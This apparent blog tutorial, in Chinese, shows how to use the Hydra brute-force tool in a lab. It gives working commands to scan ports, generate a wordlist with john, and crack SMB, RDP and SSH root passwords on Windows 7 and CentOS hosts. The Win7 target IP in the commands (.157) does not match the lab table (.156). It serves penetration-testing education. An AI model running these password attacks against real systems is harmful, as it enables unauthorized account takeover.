1.1 hydra介绍
Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP 等服务,支持Linux、Windows、 Mac平台安装,其中Kali Linux中自带Hydra。
1.2 hydra使用
1.2.1 hydra参数解释
-l:指定单个用户名称.
-L:指定用户名称字典
-p:指定单个密码
-P:指定密码字典
-S:指定端口
-vV:显示详细的执行过程
-t:通过-t参数来指定线程数默认是16会造成服务器拒绝连接,切记不能太快
-e:表示提供了更多测试选项,nsr 后面的字母对应更多的测试方式:
n:是尝试空密码登录
s:是将用户名作为密码登录
r:是将用户名反过来作为密码登录,如用户名是root,那么会使用toor尝试破解
1.3 实验环境
| 序号 | 主机IP | 主机系统 | 主机角色 |
| 1 | 192.168.10.180 | Kali | 攻击机 |
| 2 | 192.168.10.129 | Windows 10 64位 | 攻击机 |
| 3 | 192.168.10.156 | Windows 7 32位 | 被攻击机 |
| 4 | 192.168.10.80 | Centos 7 64位 | 被攻击机 |
1.4 实例:使用hydra破解系统用户密码
1.4.1 破解win7文件共享密码
1.4.1.1 开启windows文件共享
在Windows系统当中,默认会启动一些文件共享,比如C$或ADMIN$ (管理共享),而这些共享是使用smb协议,因此我可以针对smb协议进行破解。
1.4.1.2 扫描445端口是否开启
# nmap 192.168.10.157 -p 445 PORT STATE SERVICE 445/tcp open microsoft-ds
1.4.1.3 生成密码字典
通过john工具生成简单的密码字典,一般的弱口令都会包含进去:
# john --wordlist --rules --stdout > m.txt
1.4.1.4 破解smb文件共享密码
# hydra -l pm -P m.txt smb://192.168.10.157 –vV
1.4.1.5 通过密码远程访问主机资源
在物理机或其他windows主机中打开运行(Win+R)窗口,输入 \\192.168.10.157\c$:
1.4.2 破解win7远程桌面密码
1.4.2.1 开启远程桌面
1.4.2.2 扫描3389端口是否开启
# nmap 192.168.10.157 -p 3389 PORT STATE SERVICE 3389/tcp open ms-wbt-server
1.4.2.3 生成密码字典
参考 《1.4.1.3》章节
1.4.2.4 破解远程桌面密码
# hydra -l pm -P m.txt rdp://192.168.10.157 –vV
1.4.2.5 通过远程桌面访问主机资源
1.4.3 破解ssh服务root密码
1.4.3.1 扫描ssh端口是否开启
# nmap 192.168.10.80 -p 22 PORT STATE SERVICE 22/tcp open ssh
1.4.3.2 生成密码字典
参考 《1.4.1.3》章节
1.4.3.3 破解ssh远程密码
# hydra -l root -P m.txt -t 4 ssh://192.168.10.80 -e nsr –vV
我的微信
如果有技术上的问题可以扫一扫我的微信
